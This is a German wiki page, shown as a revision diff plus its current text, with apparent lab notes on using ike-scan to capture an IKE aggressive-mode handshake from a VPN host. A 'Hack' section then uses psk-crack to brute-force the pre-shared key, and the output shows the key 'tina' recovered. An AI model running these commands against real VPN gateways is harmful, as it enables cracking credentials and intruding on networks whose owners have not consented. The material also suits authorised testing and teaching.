Ike-scan: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
Thomas (Diskussion | Beiträge) |
Thomas (Diskussion | Beiträge) |
||
(2 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt) | |||
Zeile 1: | Zeile 1: | ||
+ | =Szenario= | ||
+ | *[[strongswan zu strongswan aggressive modus|vpn aggressive modus]] | ||
+ | |||
=Install= | =Install= | ||
*apt-get install ike-scan | *apt-get install ike-scan | ||
− | = | + | =Scan= |
*ike-scan -A 10.84.252.32 -Pike.key | *ike-scan -A 10.84.252.32 -Pike.key | ||
<pre> | <pre> | ||
Zeile 9: | Zeile 12: | ||
Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec). 1 returned handshake; 0 returned notify | Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec). 1 returned handshake; 0 returned notify | ||
</pre> | </pre> | ||
+ | =Hack= | ||
*psk-crack -b 5 ike.key | *psk-crack -b 5 ike.key | ||
<pre> | <pre> | ||
Zeile 16: | Zeile 20: | ||
key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942 | key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942 | ||
Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec) | Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec) | ||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
− | |||
</pre> | </pre> | ||
=Guide= | =Guide= | ||
*http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide | *http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide |
Aktuelle Version vom 9. November 2017, 10:03 Uhr
Szenario
Install
- apt-get install ike-scan
Scan
- ike-scan -A 10.84.252.32 -Pike.key
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 10.84.252.32 Aggressive Mode Handshake returned HDR=(CKY-R=653dfd98f52029b0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_IPV4_ADDR, Value=10.84.252.32) Hash(20 bytes) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Ending ike-scan 1.9.4: 1 hosts scanned in 0.046 seconds (21.84 hosts/sec). 1 returned handshake; 0 returned notify
Hack
- psk-crack -b 5 ike.key
Starting psk-crack [ike-scan 1.9.4] (http://www.nta-monitor.com/tools/ike-scan/) Running in brute-force cracking mode Brute force with 36 chars up to length 5 will take up to 60466176 iterations key "tina" matches SHA1 hash 2b71fba7f075ba64027852360147ea220c7b9942 Ending psk-crack: 497046 iterations in 0.992 seconds (501032.72 iterations/sec)